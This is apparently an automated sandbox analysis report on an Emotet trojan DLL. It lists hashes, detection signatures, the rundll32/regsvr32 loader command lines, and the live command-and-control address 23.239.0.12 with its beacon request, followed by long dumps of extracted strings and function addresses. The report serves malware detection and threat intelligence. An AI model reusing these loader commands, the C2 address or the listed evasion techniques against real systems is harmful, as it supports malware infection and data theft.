Windows Analysis Report
Ns2al4764F

Overview

General Information

Sample Name: Ns2al4764F (renamed file extension from none to dll)
Analysis ID: 626476
MD5: 07cf30fbb8f6645454eed3f7781d1ae5
SHA1: 3ea37e70f20524b481bcc0d33ebfc145c008925d
SHA256: 672a3c846ca7630201810bd9317f38d270a259bb76fb27ed847137b0c4528f58
Tags: exe trojan

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 4080 cmdline: loaddll64.exe "C:\Users\user\Desktop\Ns2al4764F.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 5284 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 3024 cmdline: rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 920 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 2324 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 2420 cmdline: rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2296 cmdline: rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 5792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2296 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3000 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5860 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4364 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 408 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 244 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 276 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 2404 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6432 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
(3 further entries not shown)

Source | Rule | Description | Author
5.2.regsvr32.exe.620000.1.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
3.2.rundll32.exe.14e051b0000.1.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
4.2.rundll32.exe.2be35aa0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
2.2.regsvr32.exe.ca0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
3.2.rundll32.exe.14e051b0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
(3 further entries not shown)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Ns2al4764F.dll; Virustotal: Detection: 35%
Source: https://23.239.0.12/C; Avira URL Cloud: Label: malware
Source: https://23.239.0.12/#mWwn; Avira URL Cloud: Label: malware
Source: https://23.239.0.12/D; Avira URL Cloud: Label: malware
Source: unknown; HTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: Ns2al4764F.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\regsvr32.exe; Code function: 5_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose

Networking

Source: C:\Windows\System32\regsvr32.exe; Network Connect: 23.239.0.12 443
Source: Joe Sandbox View; ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View; JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  Cookie: Dyz=DabvmfULUPwRS87n3NYaWAB5lbtM+RX1RWCxIsW5JR2ugrMjYBp820HE70OdzwJs7yvgQCtqT9ZajKoH765EieJsgJY5Ki8zTzKQ99Gho8WMqwDn4OyZsaEfNbr84GkPPx5HtU7nHZMAlr2v3mlg410lium/3Uzv2iMM+QbLckLf53rpF7ndEZLZxV5q4uD1NTdffI52CoPOk7Ky1CgFUQCgYCDOBhB/qP6OSm4ZCqhqrMM5PSKhRo5dTpg29g==
  Host: 23.239.0.12
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 23.239.0.12
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown; Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown; TCP traffic detected without corresponding DNS query: 23.239.0.12 (9 occurrences)
Source: regsvr32.exe, 00000005.00000002.758391409.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314103484.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.664499612.0000017546A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405585902.0000021A89700000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000014.00000002.664499612.0000017546A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405585902.0000021A89700000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://%s.xboxlive.com
Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://23.239.0.12/
Source: regsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://23.239.0.12/#mWwn
Source: regsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://23.239.0.12/C
Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://23.239.0.12/D
Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000002.313436972.000001521A269000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.312935601.000001521A267000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.313388422.000001521A253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313008479.000001521A24C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000002.313431355.000001521A264000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000003.313083570.000001521A245000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000003.313083570.000001521A245000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000002.313352467.000001521A23A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000F.00000002.313388422.000001521A253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313008479.000001521A24C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000017.00000003.383408735.0000021A897D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383363600.0000021A897D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383647935.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383604204.0000021A897BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383566783.0000021A8979C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: C:\Windows\System32\regsvr32.exe; Code function: 5_2_00000001800132F0 InternetReadFile,RtlAllocateHeap
Source: global traffic; HTTP traffic detected:
  GET / HTTP/1.1
  Cookie: Dyz=DabvmfULUPwRS87n3NYaWAB5lbtM+RX1RWCxIsW5JR2ugrMjYBp820HE70OdzwJs7yvgQCtqT9ZajKoH765EieJsgJY5Ki8zTzKQ99Gho8WMqwDn4OyZsaEfNbr84GkPPx5HtU7nHZMAlr2v3mlg410lium/3Uzv2iMM+QbLckLf53rpF7ndEZLZxV5q4uD1NTdffI52CoPOk7Ky1CgFUQCgYCDOBhB/qP6OSm4ZCqhqrMM5PSKhRo5dTpg29g==
  Host: 23.239.0.12
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown; HTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49764 version: TLS 1.2

E-Banking Fraud

Source: Yara match; File source: 5.2.regsvr32.exe.620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.14e051b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.rundll32.exe.2be35aa0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.regsvr32.exe.ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.14e051b0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.rundll32.exe.2be35aa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.regsvr32.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.regsvr32.exe.620000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.243462226.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.240757372.0000014E051B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.240813581.000002BE35AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\regsvr32.exe; File deleted: C:\Windows\System32\GfWDwmUjKsXua\cGZwFaJkDV.dll:Zone.Identifier
Source: C:\Windows\System32\regsvr32.exe; File created: C:\Windows\system32\GfWDwmUjKsXua\
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9FB6C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9EB60
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9A77C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9AF70
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB96F0C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9E6C0
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9AA0C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9B5CC
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB95944
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9895C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00007FFFEFB9FCA0
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00C90000
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180010FF4
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180028C20
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018002C058
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180009100
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180007958
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001C964
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000C608
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180021618
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180013E28
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001E3AC
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001DBE8
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001FC0C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000580C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180022010
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001481C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018002A42C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180011834
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180023831
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180021C3C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000703C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000AC48
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000FC48
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180024458
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180006458
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001C05C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001A460
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180029888
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018001D49C
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180008CA0
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800248A8
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180015CB0
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800124B4
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000C4B4
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800288B8
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800024B8
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000D8C4
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800250CC
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800190D4
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180017CE4
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800264F0
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_00000001800014F8
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180020CFC
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018002C904
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180017908
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_0000000180021510
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000F917
Source: C:\Windows\System32\regsvr32.exe; Code function: 2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800245742_2_0000000180024574
